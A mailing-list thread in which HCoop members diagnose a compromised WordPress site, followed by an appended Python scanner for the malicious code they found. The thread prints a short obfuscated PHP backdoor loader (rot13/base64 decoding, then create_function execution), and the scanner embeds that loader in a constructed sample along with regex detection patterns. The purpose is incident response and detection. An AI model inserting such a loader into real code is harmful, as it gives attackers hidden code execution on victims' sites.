On May 17, 2013, at 10:39 PM, Clinton Ebadi <[email protected]> wrote:
> Yagnesh Raghava Yakkala <[email protected]> writes:
>
>> Hello all,
>>
>> My inbox is getting filled with mail delivery failure notices today (similar
>> to the attached mail). It looks like it has something to do with akismet spam
>> filter on my wordpress site (sapporoindians.com). I don't understand the
>> problem.
>>
>> Any insights would be great on:
>> - how to know which program is initiating mail delivery
>> - how to stop receiving failure notices to my inbox
>>
>> FYI, I haven't touched anything on my site for a long while now.
>
> Ack, Jesse is right -- your site has most definitely been hacked!
>
> This code is in a few files:
>
> $z=get_option("_site_transient_browser_fd2cad7aa8fab7055192469be2dc6c7d");
> $z=base64_decode(str_rot13($z)); if(strpos($z,"C260540C")!==false){
> $_z=create_function("",$z); @$_z(); }

This looks a lot like the crack's signature as discussed in the wordpress forum entry I mentioned earlier: http://wordpress.org/support/topic/site-hacked-through-akismet

> First, your wp-content directory is allowing ANYONE in the entire world
> to write to it via afs... did you accidentally grant system:anyuser
> write permissions when trying to do something else (I know the plugin
> installer does not work unless your daemon user can write to
> wp-content)?
>
> Then there is the telltale chmod 777 (that does nothing, since we are
> using afs).

Again, other wordpress sites cracked with this exploit have had many permissions opened wide.

Yagnesh, in addition to Clinton's always excellent advice I bet you'd find some good repair suggestions from other wordpress users on the wordpress forums. Heck, sites have been falling from this exploit for almost a year now, so there may be a pinned entry or a faq.

Sapporo huh? Way up north in Hokkaido. My brother spent a couple of years in Hokkaido. He said it was very cold, and this from someone who grew up and lives in the Rocky Mountains (Utah and Colorado).

Best Regards,
--
Jesse Shumway
_______________________________________________
HCoop-Help mailing list
[email protected]
https://lists.hcoop.net/listinfo/hcoop-help
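
A sweep for the loader quoted in the message above, as an added example that is not part of the original thread or of any HCoop tooling. The indicator names, the helper functions `scan_text`, `scan_tree` and `demo`, and the sample tree layout are assumptions made for illustration; the sample files are constructed.

```python
import re
import stat
import tempfile
from pathlib import Path

# Indicators lifted from the loader quoted in the message above.
INDICATORS = {
    "option_payload": re.compile(
        r"get_option\(\s*['\"]_site_transient_browser_[0-9a-f]{32}['\"]\s*\)"),
    "rot13_base64": re.compile(r"base64_decode\(\s*str_rot13\("),
    "create_function": re.compile(r"create_function\(\s*['\"]{2}\s*,\s*\$\w+\s*\)"),
}
# Constructed samples: the quoted loader in a stub file, and a one-indicator file.
INFECTED = ('<?php /* constructed plugin stub */\n'
            '$z=get_option("_site_transient_browser_fd2cad7aa8fab7055192469be2dc6c7d");\n'
            '$z=base64_decode(str_rot13($z)); if(strpos($z,"C260540C")!==false){\n'
            '$_z=create_function("",$z); @$_z(); }\n')
ONE_HIT = '<?php $s = base64_decode(str_rot13($cfg)); // constructed\n'

def scan_text(text):
    """Names of the indicators present in one PHP source string."""
    return sorted(name for name, rx in INDICATORS.items() if rx.search(text))

def scan_tree(root, min_hits=2):
    """PHP files under root with >= min_hits indicators; world_writable is mode bits only."""
    findings = []
    for path in sorted(Path(root).rglob("*.php")):
        try:
            hits = scan_text(path.read_text(errors="replace"))
            mode = path.stat().st_mode
        except OSError:
            continue  # unreadable file: skip rather than abort the sweep
        if len(hits) >= min_hits:
            findings.append({"file": path.relative_to(root).as_posix(),
                             "indicators": hits,
                             "world_writable": bool(mode & stat.S_IWOTH)})
    return findings

def demo():
    """Build a constructed wp-content tree in a temp dir and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        plugin = Path(tmp, "plugins", "akismet")
        plugin.mkdir(parents=True)
        (plugin / "akismet.php").write_text(INFECTED)
        (plugin / "admin.php").write_text(ONE_HIT)
        (plugin / "akismet.php").chmod(0o777)
        return scan_tree(tmp)

if __name__ == "__main__":
    print(demo())
```

Requiring two indicators keeps a lone `base64_decode(str_rot13(...))` from being flagged. On AFS the mode bits do nothing, as the message says, so directory ACLs still need a separate review with `fs listacl`.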
